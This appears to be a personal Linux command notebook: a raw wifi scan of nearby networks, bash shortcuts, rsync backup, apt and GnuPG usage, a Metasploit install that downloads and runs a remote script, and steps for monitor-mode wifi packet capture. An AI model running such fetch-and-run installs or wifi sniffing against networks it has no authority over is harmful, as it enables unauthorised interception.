3C017F40017F64017F68017F6C017F70017F74017F7801 7F7C017F80017F84017F88017F8C017F90017F95017F99017F9D017FA1017F00 IE: Unknown: 200100 IE: Unknown: C305027F7F7F00 IE: Unknown: 2D1AEF0117FFFFFFFFFEFFFFFFFF1F000001000000000018E6E71900 IE: Unknown: 3D1699071700000000000000000000000000000000000000 IE: Unknown: DD180050F202010189000364000027A4000041435E0061322F00 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 7F080100080200000040 IE: Unknown: DDA30050F204104A0001101044000102103B0001031 047001059C70E96DA715048FF831CC2D0E4C1E51021 00095175616E74656E6E6110230005546F70617A102 400064247573231301042000C433635323631393730 3542331054000800060050F20400011011001052656 66572656E63652044657369676E1008000220081049 000600372A000120105800183F0047DA8F56836CB48 6ACDE9266C7A50001010103007FC5 IE: Unknown: BF0CB279C33FAAFF0000AAFF0000 IE: Unknown: C005019B00FCFF IE: Unknown: DD1E002686010300DD0000002504069 20006019B5B8CD2740000000000000000 Cell 04 - Address: 94:8F:CF:75:BE:03 Channel:153 Frequency:5.765 GHz Quality=34/70 Signal level=-76 dBm Encryption key:on ESSID:"" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0000 IE: Unknown: 01088C1218243048606C IE: Unknown: 030199 IE: Unknown: 050400020000 IE: Unknown: 074C55532024017F28017F2C017F30017F34017F38 017F3C017F40017F64017F68017F6C017F70017F740 17F78017F7C017F80017F84017F88017F8C017F9001 7F95017F99017F9D017FA1017F00 IE: Unknown: 0B0500000EFFFF IE: Unknown: 46050000000000 IE: Unknown: 200100 IE: Unknown: C305027F7F7F00 IE: Unknown: 2A0100 IE: Unknown: 2D1AEF0117FFFFFFFFFEFFFFFFFF1F000001000000000018E6E71900 IE: Unknown: 3D1699071100000000000000000000000000000000000000 IE: Unknown: DD180050F20201018C0007A4000027A4000047A4000067A40000 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: BF0CB279C33FAAFF0000AAFF0000 IE: Unknown: C005019B00FCFF IE: Unknown: DD1E002686010300DD000000250406 920006019B5B8CD2740000000000000000 IE: Unknown: DD06002686170000 IE: Unknown: 7F080100080200000040 Cell 05 - Address: F4:17:B8:45:0D:63 Channel:153 Frequency:5.765 GHz Quality=28/70 Signal level=-82 dBm Encryption key:on ESSID:"ATTB2f6CTA" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A41545442326636435441 IE: Unknown: 01088C129824B048606C IE: Unknown: 050400010000 IE: Unknown: 074655532024011E28011E2C011E30011E34011E3801 1E3C011E40011E64011E68011E6C011E70011E74011E 84011E88011E8C011E90011E95011E99011E9D011EA1011EA5011E00 IE: Unknown: 200102 IE: Unknown: 23021400 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 420100 IE: Unknown: 46057208010000 IE: Unknown: 2D1AEF0917FFFFFF0000000000000000 000000000000000000000000 IE: Unknown: 3D16990F1500000000000000000000000 000000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: 450B8500000000000000000000 IE: Unknown: BF0CB259820FEAFF0000EAFF0000 IE: Unknown: C005019B000000 IE: Unknown: C30402020202 IE: Unknown: DD4D0050F204104A0001101044000102104700109392C0 34F0717F0BE563560D19D4FB8E103C0001021049000600 372A00012010580018E02F603829387C2ED6909E6406A0 2B500001010103007FC5 IE: Unknown: DD090010180201001C0000 IE: Unknown: DD180050F2020101040003A4000027A400 0042435E0062322F00 Cell 06 - Address: AA:17:B8:45:0D:64 Channel:153 Frequency:5.765 GHz Quality=28/70 Signal level=-82 dBm Encryption key:on ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0009000000000000000000 IE: Unknown: 01088C129824B048606C IE: Unknown: 050400010000 IE: Unknown: 074655532024011E28011E2C011E30011E34011E38011E3 C011E40011E64011E68011E6C011E70011E74011E84011E 88011E8C011E90011E95011E99011E9D011EA1011EA5011E00 IE: Unknown: 200102 IE: Unknown: 23021400 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 420100 IE: Unknown: 2D1AEF0917FFFFFF00000000000000000 00000000000000000000000 IE: Unknown: 3D16990F1500000000000000000000000 000000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: 450B8500000000000000000000 IE: Unknown: BF0CB259820FEAFF0000EAFF0000 IE: Unknown: C005019B000000 IE: Unknown: C30402020202 IE: Unknown: DD090010180200001C0000 IE: Unknown: DD180050F2020101800003A4000027A40 00042435E0062322F00 Cell 07 - Address: 30:E1:71:B2:B8:66 Channel:1 Frequency:2.412 GHz (Channel 1) Quality=28/70 Signal level=-82 dBm Encryption key:on ESSID:"DIRECT-65-HP ENVY 4510 series" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 001D4449524543542D36352D485020454 E5659203435313020736572696573 IE: Unknown: 01088C129824B048606C IE: Unknown: 030101 IE: Unknown: 200100 IE: Unknown: 23021400 IE: Unknown: 2A0100 IE: Unknown: 2F0100 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 2D1A20001AFF0000000000000000000000 0000000000000000000000 IE: Unknown: 3D16010800000000000000000000000000 00000000000000 IE: Unknown: DD090010180200000C0000 IE: Unknown: DD180050F202010188000364000027A400 0041435E0061322F00 IE: Unknown: DDC10050F204104A000110104400010210570001011 041000100103B000103104700101C852A4DB8001F08 ABCD30E171B2B86510210002485010230011454E565 9203435313020736572696573001024000534353132 001042001054483643433444304A593036384800001 054000800030050F20400051011001D444952454354 2D36352D485020454E5659203435313020736572696 5731008000200001049000600372A00012010490017 000137100600101C852A4DB8001F08ABCD30E171B2B865 IE: Unknown: DD5F080009000400000007010201000311454E56592 0343531302073657269657300040534353132000510 54483643433444304A5930363848000006101C852A4 DB8001F08ABCD30E171B2B8650704C0A8010A080200D4090200080A0400000001 Cell 08 - Address: A0:04:60:35:2D:C5 Channel:7 Frequency:2.442 GHz (Channel 7) Quality=27/70 Signal level=-83 dBm Encryption key:on ESSID:"Serenity" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0008536572656E697479 IE: Unknown: 010882840B162430486C IE: Unknown: 030107 IE: Unknown: 050400020000 IE: Unknown: 2A0104 IE: Unknown: 2F0104 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 32040C121860 IE: Unknown: 2D1AFC181FFFFF00000000000000000000 0000000000000000000000 IE: Unknown: 3D1607001700000000000000000000000 000000000000000 IE: Unknown: 4A0E14000A002C01C800140005001900 IE: Unknown: 7F0101 IE: Unknown: DD310050F204104A000110104400010210470010A21532 ABF96932FFFC3498EB23C50E74103C0001031049000600372A000120 IE: Unknown: DD090010180205F0040000 IE: Unknown: DD180050F2020101800003A4000027A40 00042435E0062322F00 Cell 09 - Address: BC:A5:11:99:2E:38 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=66/70 Signal level=-44 dBm Encryption key:on ESSID:"ATTFJ4Br3A_2GEXT" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0010415454464A34427233415F3247455854 IE: Unknown: 010882848B960C121824 IE: Unknown: 03010B IE: Unknown: 0706555320010B1E IE: Unknown: 2A0104 IE: Unknown: 32043048606C IE: Unknown: 2D1AAD0903FFFF000000000000000000000 100000000000000000000 IE: Unknown: 3D160B00000000000000000000000000000 0000000000000 IE: Unknown: 4A0E14000A002C01C800140005001900 IE: Unknown: 7F0801000F0200000040 IE: Unknown: BF0CB2498933FAFF0000FAFF0000 IE: Unknown: C005000000FCFF IE: Unknown: DD180050F2020101800003A4000027A400 0042435E0062322F00 IE: Unknown: DD0900037F01010000FF7F IE: Unknown: DD870050F204104A0001101044000102103B0001031047 0010876543219ABCDEF01234BCA511992E38102100044E 5447521023000845583631353076321024000256321042 000D344C56363942355941303044361054000800060050 F204000110110015455836313530763228576972656C65 7373204150291008000220081049000600372A000120 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK Cell 10 - Address: C8:52:61:97:05:B0 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=70/70 Signal level=-34 dBm Encryption key:on ESSID:"ATTFJ4Br3A" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A415454464A3442723341 IE: Unknown: 010882848B962430486C IE: Unknown: 03010B IE: Unknown: 2A0100 IE: Unknown: 32040C121860 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 0B050200160000 IE: Unknown: 46053208010000 IE: Unknown: 2D1AAD091FFFFFFF000000000000000000 0000000000000000000000 IE: Unknown: 3D160B0804000000000000000000000000 00000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: DD930050F204104A0001101044000102103B00010310 47001059C70E96DA715048FF831CC2D0E4C1E5102100 0B41727269732C20496E632E1023000A424757323130 2D3730301024000A4247573231302D3730301042000A 4247573231302D3730301054000800060050F2040001 1011000E417272697320576972656C65737310080002 2008103C0001011049000600372A000120 IE: Unknown: DD090010180202101C0000 IE: Unknown: DD180050F2020101840003A4000027A 4000042435E0062322F00 Cell 11 - Address: 94:8F:CF:75:BE:00 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=51/70 Signal level=-59 dBm Encryption key:on ESSID:"ATTB2f6CTA" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A41545442326636435441 IE: Unknown: 010882848B962430486C IE: Unknown: 03010B IE: Unknown: 2A0100 IE: Unknown: 32040C121860 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 0B050000250000 IE: Unknown: 46053208010000 IE: Unknown: 2D1AAD091FFFFFFF0000000000000 000000000000000000000000000 IE: Unknown: 3D160B08110000000000000000000 0000000000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: DD930050F204104A0001101044000102103B000103 10470010A61ECC86A44EB89E90A0F6E896C6224010 21000B41727269732C20496E632E1023000A424757 3231302D3730301024000A4247573231302D373030 1042000A4247573231302D37303010540008000600 50F20400011011000E417272697320576972656C65 7373100800022008103C0001011049000600372A000120 IE: Unknown: DD090010180200101C0000 IE: Unknown: DD180050F2020101840003A4000027 A4000042435E0062322F00
---[Bash]--- (top)
Bash Keyboard Shortcuts Moving the cursor: Ctrl + a Go to the beginning of the line (Home) Ctrl + e Go to the End of the line (End) Ctrl + p Previous command (Up arrow) Ctrl + n Next command (Down arrow) Alt + b Back (left) one word Alt + f Forward (right) one word Ctrl + f Forward one character Ctrl + b Backward one character Ctrl + xx Toggle between the start of line and current cursor position Editing: Ctrl + L Clear the Screen, similar to the clear command Alt + Del Delete the Word before the cursor. Alt + d Delete the Word after the cursor. Ctrl + d Delete character under the cursor Ctrl + h Delete character before the cursor (Backspace) Ctrl + w Cut the Word before the cursor to the clipboard. Ctrl + k Cut the Line after the cursor to the clipboard. Ctrl + u Cut/delete the Line before the cursor to the clipboard. Alt + t Swap current word with previous Ctrl + t Swap the last two characters before the cursor (typo). Esc + t Swap the last two words before the cursor. ctrl + y Paste the last thing to be cut (yank) Alt + u UPPER capitalize every character from the cursor to the end of the current word. Alt + l Lower the case of every character from the cursor to the end of the current word. Alt + c Capitalize the character under the cursor and move to the end of the word. Alt + r Cancel the changes and put back the line as it was in the history (revert). ctrl + _ Undo TAB Tab completion for file/directory names For example, to move to a directory 'sample1'; Type cd sam ; then press TAB and ENTER. type just enough characters to uniquely identify the directory you wish to open. Special keys: Tab, Backspace, Enter, Esc Text Terminals send characters (bytes), not key strokes. Special keys such as Tab, Backspace, Enter and Esc are encoded as control characters. Control characters are not printable, they display in the terminal as ^ and are intended to have an effect on applications. Ctrl+I = Tab Ctrl+J = Newline Ctrl+M = Enter Ctrl+[ = Escape Many terminals will also send control characters for keys in the digit row: Ctrl+2 ^@ Ctrl+3 ^[ Escape Ctrl+4 ^\ Ctrl+5 ^] Ctrl+6 ^^ Ctrl+7 ^_ Undo Ctrl+8 ^? Backward-delete-char Ctrl+v tells the terminal to not interpret the following character, so Ctrl+v Ctrl-I will display a tab character, similarly Ctrl+v ENTER will display the escape sequence for the Enter key: ^M History: Ctrl + r Recall the last command including the specified character(s) searches the command history as you type. Equivalent to : vim ~/.bash_history. Ctrl + p Previous command in history (i.e. walk back through the command history) Ctrl + n Next command in history (i.e. walk forward through the command history) Ctrl + s Go back to the next most recent command. (beware to not execute it from a terminal because this will also launch its XOFF). Ctrl + o Execute the command found via Ctrl+r or Ctrl+s Ctrl + g Escape from history searching mode !! Repeat last command !n Repeat from the last command: args n e.g. !:2 for the second argumant. !n:m Repeat from the last command: args from n to m. e.g. !:2-3 for the second and third. !n:$ Repeat from the last command: args n to the last argument. !n:p Print last command starting with n !$ Last argument of previous command ALT + . Last argument of previous command !* All arguments of previous command ^abc^def Run previous command, replacing abc with def Process control: Ctrl + C Interrupt/Kill whatever you are running (SIGINT) Ctrl + l Clear the screen Ctrl + s Stop output to the screen (for long running verbose commands) Then use PgUp/PgDn for navigation Ctrl + q Allow output to the screen (if previously stopped using command above) Ctrl + D Send an EOF marker, unless disabled by an option, this will close the current shell (EXIT) Ctrl + Z Send the signal SIGTSTP to the current task, which suspends it. To return to it later enter fg 'process name' (foreground). ALT key shortcuts 1. ALT+A - Go to the beginning of a line. 2. ALT+B - Move one character before the cursor. 3. ALT+C - Suspends the running command/process. Same as CTRL+C 4. ALT+D - Closes the empty Terminal (i.e it closes the Terminal when there is nothing typed). Also deletes all characters after the cursor. 5. ALT+F - Move forward one character. 6. ALT+T - Swaps the last two words. 7. ALT+U - Capitalize all characters in a word after the cursor. 8. ALT+L - Uncaptalize all characters in a word after the cursor. 9. ALT+R - Undo any changes to a command that you have brought from the history if you’ve edited it. 10. ALT+. (note the dot at the end) - Use the last word of the previous command. CTRL key shortcuts 1. CTRL+A - Quickly move to the beginning of line. 2. CTRL+B - To move backward one character. This shortcut key can move the cursor backward one character i.e one character before the cursor. Alternatively, you can use LEFT arrow to move backward one character. 3. CTRL+C - Stop the currently running command If a command takes too long to complete or if you mistakenly run it, you can forcibly stop or quit the command by using CTRL+C. 4. CTRL+D - Delete one character backward. If you have a system where the BACKSPACE key isn't working, you can use CTRL+D to delete one character backward. This shortcut also lets you logs out of the current session, similar to exit. 5. CTRL+E - Move to the end of line After you corrected any misspelled word in the start of a command or line, just hit CTRL+E to quickly move to the end of the line. Alternatively, you can use END key in your keyboard. 6. CTRL+F - Move forward one character If you want to move the cursor forward one character after another, just press CTRL+F instead of RIGHT arrow key. 7. CTRL+G - Leave the history searching mode without running the command. 8. CTRL+H - Delete the characters before the cursor, same as BASKSPACE. 9. CTRL+J - Same as ENTER/RETURN key. Tip: ENTER key is not working? No problem! CTRL+J or CTRL+M can be used as an alternative to ENTER key. 10. CTRL+K - Delete all characters after the cursor. You don't have to keep hitting the DELETE key to delete the characters after the cursor. Just press CTRL+K to delete all characters after the cursor. 11. CTRL+L - Clears the screen and redisplay the line. Don't type "clear" to clear the screen. Just press CTRL+L to clear and redisplay the currently typed line. 12. CTRL+M - Same as CTRL+J or RETURN. 13. CTRL+N - Display next line in command history. You can also use DOWN arrow. 14. CTRL+O - Run the command that you found using reverse search i.e CTRL+R. 15. CTRL+P - Displays the previous line in command history. You can also use UP arrow. 16. CTRL+R - Searches the history backward (Reverse search). 17. CTRL+S - Searches the history forward. 18. CTRL+T - Swaps the last two characters. 19. CTRL+U - Delete all characters before the cursor (Kills backward from point to the beginning of line). This shortcut will delete all typed characters backward at once. 20. CTRL+V - Makes the next character typed verbatim 21. CTRL+W - Delete the words before the cursor. 22. CTRL+X - Lists the possible filename completions of the current word. 23. CTRL+XX - Move between start of command line and current cursor position (and back again). 24. CTRL+Y - Retrieves last item that you deleted or cut. 25. CTRL+Z - Stops the current command. 26. CTRL+[ - Equivalent to ESC key. Miscellaneous 1. !! - Repeats the last command. 2. ESC+t - Swaps the last two words. How-to: Bash Keyboard Shortcuts Moving the cursor: Ctrl + a Go to the beginning of the line (Home) Ctrl + e Go to the End of the line (End) Ctrl + p Previous command (Up arrow) Ctrl + n Next command (Down arrow) Alt + b Back (left) one word Alt + f Forward (right) one word Ctrl + f Forward one character Ctrl + b Backward one character Ctrl + xx Toggle between the start of line and current cursor position Editing: Ctrl + L Clear the Screen, similar to the clear command Alt + Del Delete the Word before the cursor. Alt + d Delete the Word after the cursor. Ctrl + d Delete character under the cursor Ctrl + h Delete character before the cursor (Backspace) Ctrl + w Cut the Word before the cursor to the clipboard. Ctrl + k Cut the Line after the cursor to the clipboard. Ctrl + u Cut/delete the Line before the cursor to the clipboard. Alt + t Swap current word with previous Ctrl + t Swap the last two characters before the cursor (typo). Esc + t Swap the last two words before the cursor. ctrl + y Paste the last thing to be cut (yank) Alt + u UPPER capitalize every character from the cursor to the end of the current word. Alt + l Lower the case of every character from the cursor to the end of the current word. Alt + c Capitalize the character under the cursor and move to the end of the word. Alt + r Cancel the changes and put back the line as it was in the history (revert). ctrl + _ Undo TAB Tab completion for file/directory names For example, to move to a directory 'sample1'; Type cd sam ; then press TAB and ENTER. type just enough characters to uniquely identify the directory you wish to open. Special keys: Tab, Backspace, Enter, Esc Text Terminals send characters (bytes), not key strokes. Special keys such as Tab, Backspace, Enter and Esc are encoded as control characters. Control characters are not printable, they display in the terminal as ^ and are intended to have an effect on applications. Ctrl+I = Tab Ctrl+J = Newline Ctrl+M = Enter Ctrl+[ = Escape Many terminals will also send control characters for keys in the digit row: Ctrl+2 → ^@ Ctrl+3 → ^[ Escape Ctrl+4 → ^\ Ctrl+5 → ^] Ctrl+6 → ^^ Ctrl+7 → ^_ Undo Ctrl+8 → ^? Backward-delete-char Ctrl+v tells the terminal to not interpret the following character, so Ctrl+v Ctrl-I will display a tab character, similarly Ctrl+v ENTER will display the escape sequence for the Enter key: ^M History: Ctrl + r Recall the last command including the specified character(s). searches the command history as you type. Equivalent to : vim ~/.bash_history. Ctrl + p Previous command in history (i.e. walk back through the command history). Ctrl + n Next command in history (i.e. walk forward through the command history). Ctrl + s Go back to the next most recent command. (beware to not execute it from a terminal because this will also launch its XOFF). Ctrl + o Execute the command found via Ctrl+r or Ctrl+s Ctrl + g Escape from history searching mode !! Repeat last command !n Repeat from the last command: args n e.g. !:2 for the second argumant. !n:m Repeat from the last command: args from n to m. e.g. !:2-3 for the second and third. !n:$ Repeat from the last command: args n to the last argument. !n:p Print last command starting with n !string Print the last command beginning with string. !:q Quote the last command with proper Bash escaping applied. Tip: enter a line of Bash starting with a # comment, then run !:q on the next line to escape it. !$ Last argument of previous command. ALT + . Last argument of previous command. !* All arguments of previous command. ^abc^def Run previous command, replacing abc with def Process control: Ctrl + C Interrupt/Kill whatever you are running (SIGINT). Ctrl + l Clear the screen. Ctrl + s Stop output to the screen (for long running verbose commands). Then use PgUp/PgDn for navigation. Ctrl + q Allow output to the screen (if previously stopped using command above). Ctrl + D Send an EOF marker, unless disabled by an option, this will close the current shell (EXIT). Ctrl + Z Send the signal SIGTSTP to the current task, which suspends it. To return to it later enter fg 'process name' (foreground).
# Disable exit on non 0 set +e #Do something. If something fails with exit!=0 the script continues anyway # Enable exit on non 0 set -e # Do something. If something fails with exit!=0 the script stops
https://wiki.archlinux.org/title/Rsync#Full_system_backup
Full system backup
This section is about using rsync to transfer a copy of the entire / tree, excluding a few selected directories. This approach is considered to be better than disk cloning with dd since it allows for a different size, partition table and filesystem to be used, and better than copying with cp -a as well, because it allows greater control over file permissions, attributes, Access Control Lists and extended attributes.
rsync will work even while the system is running, but files changed during the transfer may or may not be transferred, which can cause undefined behavior of some programs using the transferred files.
This approach works well for migrating an existing installation to a new hard drive or SSD.
Run the following command as root to make sure that rsync can access all system files and preserve the ownership:
# rsync -aAXHv --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*", "/run/*","/mnt/*","/media/*","/lost+found"} / /path/to/backup
Actual command used in production;
rsync -aAXHv --progress --exclude={"/dev/*","/home/*","/proc/*", "/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / /media/parth/SYSBKUP/Mike
are running this multiple times to the same backup directory. In this case make sure that the source path does not end with /*, or this option will only have effect on the files inside the subdirectories of the source directory, but it will have no effect on the files residing directly inside the source directory.
If you use any sparse files, such as virtual disks, Docker images and similar, you should add the -S option.
The --numeric-ids option will disable mapping of user and group names; instead, numeric group and user IDs will be transfered. This is useful when backing up over SSH or when using a live system to backup different system disk.
Choosing --info=progress2 option instead of -v will show the overall progress info and transfer speed instead of the list of files being transferred.
To avoid crossing a filesystem boundary when recursing, add the option -x/--one-file-system. This will prevent backing up any mount point in the hierarchy.
Restore a backup
If you wish to restore a backup, use the same rsync command that was executed but with the source and destination reversed.
---[metasploit framework]--- (top)
To install
$ sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/ templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
To update
$ apt update; apt install metasploit-framework
After the database starts, you can use any of the following commands to manage the database:
To start the postgresql db, run the command
$ sudo /opt/metasploit/ctlscript.sh start [sudo] password for parth: /opt/metasploit/postgresql/scripts/ctl.sh : postgresql started at port 7337 prosvc is starting nginx is starting metasploit is starting Worker starting in background
$ msfdb status Database started at /home/parth/.msf4/db MSF web service is running as PID 7501
Launch the console with this command. Note you have to be in /opt/metasploit-framework/bin when you run this command:
parth@wintermute:/opt/metasploit-framework/bin$ ./msfconsole
To stop the metasploit daemon:
$ /etc/init.d/metasploit stop
File locations
---[apt]--- (top)
09.28.19 I used this to add the Kali repository key to apt so I could install apps from there.
$ gpg --keyserver hkp://keys.gnupg.net --recv-key 7D8D0BF6 $ gpg --fingerprint 7D8D0BF6 $ gpg -a --export 7D8D0BF6 > kali.key $ sudo apt-key add kali.key $ sudo apt-key update
This gave me the following message: 1867 packages can be upgraded. Run 'apt list --upgradable' to see them. Looking at the list, it looks like it might replace much of Mint, so I removed the kali repository line (deb http://http.kali.org/kali kali-rolling main non-free contrib) from the /etc/apt/source.list file.
List the packages that have upgrades available.
$ sudo apt list --upgradable
List installed packages
$ apt list --installed
Update the local package database
$ sudo sudo apt update
Upgrade installed packages
$ sudo apt upgrade
There is another way to provide a complete upgrade by using the command below:
$ sudo apt full-upgrade
Install a new package
$ sudo apt install (package_name)
List upgradable packages
$ sudo apt list upgradable
$ sudo apt list --upgradable | less
List available packages
$ apt-cache search (package_name or keyword)
Removing a package
$ sudo apt remove (package_name)
Remove a package, along with all configuration files etc...
$ sudo apt purge (package_name)
$ apt-cache dumpavail | grep Description: | grep record
More examples
To list the installed packages on your Ubuntu system use the following command: sudo apt list --installed sudo apt list --installed | grep screen sudo dpkg-query -l | less sudo dpkg-query -l | grep package_name To create a list of the names of all installed packages on your Ubuntu or Debian system and save it in a file named packages_list.txt, run the following command: sudo dpkg-query -f '${binary:Package}\n' -W > packages_list.txt Now that you have the list, if you want to install the same packages on your new server you can do that with: sudo xargs -a packages_list.txt apt install
---[gnupg gpg examples]--- (top)
$
The GPA GUI app can be used for most functions.
To encrypt a file:
$ gpg --e --sign -r WBBellamy@gmail.com name_of_file
To decrypt a file:
$ gpg file_name
Symmetric encryption means that you use the same key to both encrypt and decrypt a file. To encrypt a file with minimal effort, you could use a command like this:
$ gpg2 --symmetric myfile
This command will leave you with two files — myfile and myfile.gpg. Once you verify that the encrypted version of your original file has been created, you can use the shred command to securely remove the original file in a way that prevents it from being scraped off the disk with some disk recovery tool. During the encryption process, this command will also open up a tool on your desktop to prompt you twice to enter your passphrase. So, you have to be working on the desktop.
Change your GPG key’s passphrase
gpg --passwd nick@example.com
Export your GPG public key
# Echo your public key to stdout. gpg --export --armor nick@example.com
# Write your public key to a file. gpp --export --armor --output nickexample.gpg.pub nick@example.com
Get a gpg Key
$ gpg -k "05AE85193A16AC7B" pub rsa3072 2020-12-03 [SC] 96606AD4E8214AF6EE20F84805AE85193A16AC7B uid [ultimate] William Ben Bellamy Jr sub rsa3072 2020-12-03 [E] sub rsa4096 2020-12-03 [E]
# Revoke the GPG key. gpg --import revoke-nickexample.asc
Edit your GPG key’s expiration date gpg --edit-key nick@example.com # key 0 # expire [pick a new exp date] # key 1 # expire [pick a new exp date] # save
List your GPG keys gpg --list-keys
Edit your key Running the gpg --edit-key user-id command will present a menu which enables you to do most of your key management related tasks. Type help in the edit key sub menu to show the complete list of commands. Some useful ones: > passwd # change the passphrase > clean # compact any user ID that is no longer usable (e.g revoked or expired) > revkey # revoke a key > addkey # add a subkey to this key > expire # change the key expiration time > adduid # add additional names, comments, and email addresses > addphoto # add photo to key (must be JPG, 240x288 recommended, enter full path to image when prompted) Tip: If you have multiple email accounts you can add each one of them as an identity, using adduid command. You can then set your favourite one as primary. https://wiki.archlinux.org/index.php/GnuPG#Edit_your_key
Install
$ sudo apt install gnupg
Create Private and Public Keys
Distribute your key. There are different Keyserver’s but pgp.mit.edu is the most popular one. We will use --keyserver option to specify the key server and --send-keys to provide a fingerprint of the key we want to register.
$ gpg --keyserver gpg.mit.edu --send-keys 003D114F
Export Public Key In ASCII Format
gpg --armor --output pubkey.txt --export 'ibaydan'
Encrypt A File with GPG
$ gpg --encrypt --recipient 'ibaydan' --output ServerPass.txt.enc ServerPass.txt
Decrypt A File with GPG
$ gpg --output foo.txt --decrypt ServerPass.txt.enc
List Installed GPG Keys
$ gpg --list-keys
Delete GPG Key
$ gpg --delete-key ibaydan
Delete Key with Secret Keys
$ gpg --delete-secret-keys 'ibaydan@poftut.com'
$ gpg --full-generate-key Real name: William Ben Bellamy Jr Email address: wbbellamy@gmail.com Comment: You selected this USER-ID: "William Ben Bellamy Jr <wbbellamy@gmail.com>" gpg: key A25347C3440E21D5 marked as ultimately trusted lggpg: revocation certificate stored as '/home/ben/.gnupg/openpgp-revocs.d/ B0C56E8DF8C30BB9867F5887A25347C3440E21D5.rev' public and secret key created and signed. pub rsa4096 2020-08-21 [SC] B0C56E8DF8C30BB9867F5887A25347C3440E21D5 uid William Ben Bellamy Jr <wbbellamy@gmail.com> sub rsa4096 2020-08-21 [E]
---[srm sfill sswap smem]--- (top)
Wiping a file:
$ shred -f -u -n 12 -v file_name $ srm -v file_name
Also see sfill, sswap, and smem.
---[spd-say]--- (top)
Speak Daemon Say
$ spd-say "Hawkings here. Good job!"
---[Changing interface mode]--- (top)
Get info about the wifi interface:
$ sudo iw dev phy#0 Unnamed/non-netdev interface wdev 0x2 addr fc:f8:ae:26:86:ef type P2P-device txpower 0.00 dBm Interface wlp2s0 ifindex 3 wdev 0x1 addr fc:f8:ae:26:86:ee ssid Private.net type managed channel 1 (2412 MHz), width: 20 MHz, center1: 2412 MHz txpower 22.00 dBm
Change wlp2s0 (wifi interface) to Monitor mode
First stop the Network Manager, otherwise the interface will keep resetting to managed:
$ sudo systemctl stop NetworkManager
You can later restart NetworkManager with the command below. Sometimes you may need to re-login or reboot to straighten this out:
$ sudo systemctl start NetworkManager
$ sudo ifconfig wlp2s0 down $ sudo iwconfig wlp2s0 mode Monitor $ sudo ifconfig wlp2s0 up $ sudo iwconfig
Check the available channels, and which you are currently using:
$ iwlist channel
$ iwlist frequency
Set the channel:
$ sudo iw dev wlp2s0 set channel 6 $ sudo iwconfig wlp2s0 channel 6
Run tcpdump to capture wifi traffic:
$ sudo tcpdump -v -i wlp2s0
FYI: Include start datetime stamp in pcap filename (capture_2019-08-28_14:03:07.pcap):
